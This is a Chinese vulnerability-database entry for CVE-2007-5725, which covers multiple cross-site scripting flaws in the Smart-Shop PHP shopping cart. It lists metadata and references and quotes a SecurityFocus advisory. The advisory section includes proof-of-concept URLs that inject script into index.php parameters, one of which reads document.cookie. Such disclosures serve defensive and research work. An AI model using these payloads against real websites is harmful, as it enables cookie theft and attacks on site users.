SMART-SHOP 多个跨站脚本攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1113868 漏洞类型 跨站脚本
发布时间 2007-10-29 更新时间 2007-11-15
CVE编号 CVE-2007-5725 CNNVD-ID CNNVD-200710-519
漏洞平台 PHP CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/30716
https://www.securityfocus.com/bid/26232
https://cxsecurity.com/issue/WLB-2007100133
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200710-519
|漏洞详情
Smart-Shop中存在多个跨站脚本攻击漏洞。远程攻击者可以借助(1)对index.php的email;或(2)主页的默认操作的index.php的指令参数,(3)一个currencies操作,或(4)一个basket操作,注入任意web脚本或HTML。
|漏洞EXP
source: http://www.securityfocus.com/bid/26232/info

SMART-SHOP is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.

Exploiting these vulnerabilities may allow an attacker to perform cross-site scripting attacks on unsuspecting users in the context of the affected website. As a result, the attacker may be able to steal cookie-based authentication credentials and to launch other attacks. 

http://www.example.com/index.php?page=&email=<Evil-Script> 
http://www.example.com/index.php?page=home&command=<Evil-Script> 
http://www.example.com/index.php?page=home&component=currencies&command=<Evil-Script> http://www.example.com/index.php?page=home&component=basket&command=%3Cscript%3Ealert(document.cookie);%3C/script%3E
|受影响的产品
SMART-SHOP.COM SMART-SHOP 0
|参考资料

来源:XF
名称:smartshop-index-xss(38144)
链接:http://xforce.iss.net/xforce/xfdb/38144
来源:BID
名称:26232
链接:http://www.securityfocus.com/bid/26232
来源:BUGTRAQ
名称:20071028Smart-ShopShoppingCartCross-SiteScriptingVulrnability
链接:http://www.securityfocus.com/archive/1/archive/1/482906/100/0/threaded
来源:SREASON
名称:3312
链接:http://securityreason.com/securityalert/3312